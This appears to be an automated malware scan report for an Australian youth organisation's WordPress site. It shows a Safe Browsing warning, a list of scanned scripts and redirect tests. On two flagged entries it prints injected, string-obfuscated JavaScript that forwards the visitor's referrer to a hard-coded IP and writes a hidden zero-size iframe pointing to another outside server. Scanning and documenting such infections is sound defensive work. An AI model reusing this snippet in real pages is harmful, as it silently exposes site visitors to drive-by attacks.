Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=youthinteraction.org.au
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://youthinteraction.org.au/ | 200 OK Content-Length: 38282 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var tds_url = 'ht' + 'tp:' + '//' + '91.' + '217.' + '91.' + '104' + '/'; var group = '?' + 'i' + 'd' + '=' + '1'; var charset = 'utf-8'; var referer = encodeURIComponent(document.referrer); var url = tds_url + '/' + group + '&se_referer=' + referer + '&charset=' + charset; document.write('<' + 'i' + 'f' + 'r' + 'a' + 'm' + 'e' + ' ' + 'w' + 'i' + 'd' + 't' + 'h' + '=' + '"' + '0' + '"' + ' ' + 'h' + 'e' + 'i' + 'g' + 'h' + 't' + '=' + '"' + '0' + '"' + ' ' + 'f' + 'r' + 'a' + 'm' + 'e' + 'b' + 'o' + 'r' + 'd' + 'e' + 'r' + '=' + '"' + '0' + '"' + ' ' + 's' + 'c' + 'r' + 'o' + 'l' + 'l' + 'i' + 'n' + 'g' + '=' + '"' + 'n' + 'o' + '"' + ' ' + 's' + 'r' + 'c' + '="' + url + '">' + '<' + '/' + 'i' + 'f' + 'r' + 'a' + 'm' + 'e' + '>'); Decoded script: <iframe width="0" height="0" frameborder="0" scrolling="no" src="http://193.203.50.43/?ftp&se_rrr=undefined&charset=utf-8"></iframe> Antivirus reports:
| ||
http://youthinteraction.org.au/wp-includes/js/comment-reply.min.js?ver=3.5.2 | 200 OK Content-Length: 786 Content-Type: application/javascript | clean |
http://youthinteraction.org.au/wp-includes/js/jquery/jquery.js?ver=1.8.3 | 200 OK Content-Length: 93658 Content-Type: application/javascript | clean |
http://youthinteraction.org.au/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.js?ver=1.3.3 | 200 OK Content-Length: 9986 Content-Type: application/javascript | clean |
http://youthinteraction.org.au/wp-content/plugins/nextgen-gallery/js/jquery.cycle.all.min.js?ver=2.9995 | 200 OK Content-Length: 26590 Content-Type: application/javascript | clean |
http://youthinteraction.org.au/wp-content/plugins/nextgen-gallery/js/ngg.slideshow.min.js?ver=1.06 | 200 OK Content-Length: 1791 Content-Type: application/javascript | clean |
http://youthinteraction.org.au/wp-content/themes/suffusion/scripts/jquery.cycle.all.min.js | 200 OK Content-Length: 28855 Content-Type: application/javascript | clean |
http://youthinteraction.org.au/wp-content/themes/suffusion/scripts/suffusion.js?ver=4.4.6 | 200 OK Content-Length: 33979 Content-Type: application/javascript | clean |
http://youthinteraction.org.au/wp-content/themes/suffusion/dbx.js | 200 OK Content-Length: 47611 Content-Type: application/javascript | clean |
http://youthinteraction.org.au/wp-includes/js/jquery/ui/jquery.ui.core.min.js?ver=1.9.2 | 200 OK Content-Length: 4693 Content-Type: application/javascript | clean |
http://youthinteraction.org.au/wp-includes/js/jquery/ui/jquery.ui.widget.min.js?ver=1.9.2 | 200 OK Content-Length: 6759 Content-Type: application/javascript | clean |
http://youthinteraction.org.au/wp-includes/js/jquery/ui/jquery.ui.progressbar.min.js?ver=1.9.2 | 200 OK Content-Length: 1589 Content-Type: application/javascript | clean |
http://youthinteraction.org.au/wp-content/plugins/wordpress-simple-survey/js/custom.js?ver=2.1.2 | 200 OK Content-Length: 2379 Content-Type: application/javascript | clean |
http://youthinteraction.org.au/wp-includes/js/tw-sack.min.js?ver=1.6.1 | 200 OK Content-Length: 3619 Content-Type: application/javascript | clean |
http://youthinteraction.org.au//ajax.googleapis.com/ajax/libs/prototype/1.7.1.0/prototype.js?ver=1.7.1/ | 200 OK Content-Length: 2488 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var tds_url = 'ht' + 'tp:' + '//' + '91.' + '217.' + '91.' + '104' + '/'; var group = '?' + 'i' + 'd' + '=' + '1'; var charset = 'utf-8'; var referer = encodeURIComponent(document.referrer); var url = tds_url + '/' + group + '&se_referer=' + referer + '&charset=' + charset; document.write('<' + 'i' + 'f' + 'r' + 'a' + 'm' + 'e' + ' ' + 'w' + 'i' + 'd' + 't' + 'h' + '=' + '"' + '0' + '"' + ' ' + 'h' + 'e' + 'i' + 'g' + 'h' + 't' + '=' + '"' + '0' + '"' + ' ' + 'f' + 'r' + 'a' + 'm' + 'e' + 'b' + 'o' + 'r' + 'd' + 'e' + 'r' + '=' + '"' + '0' + '"' + ' ' + 's' + 'c' + 'r' + 'o' + 'l' + 'l' + 'i' + 'n' + 'g' + '=' + '"' + 'n' + 'o' + '"' + ' ' + 's' + 'r' + 'c' + '="' + url + '">' + '<' + '/' + 'i' + 'f' + 'r' + 'a' + 'm' + 'e' + '>'); Decoded script: <iframe width="0" height="0" frameborder="0" scrolling="no" src="http://193.203.50.43/?ftp&se_rrr=undefined&charset=utf-8"></iframe> Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: youthinteraction.org.au
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 13 Jan 2015 05:28:54 GMT
Server: nginx/1.6.2
Content-Type: text/html
GET / HTTP/1.1
Host: youthinteraction.org.au
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 13 Jan 2015 05:28:54 GMT
Server: nginx/1.6.2
Content-Type: text/html
Second query (visit from search engine):
GET / HTTP/1.1
Host: youthinteraction.org.au
Referer: http://www.google.com/search?q=youthinteraction.org.au
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: youthinteraction.org.au
Referer: http://www.google.com/search?q=youthinteraction.org.au
Result:
The result is similar to the first query. There are no suspicious redirects found.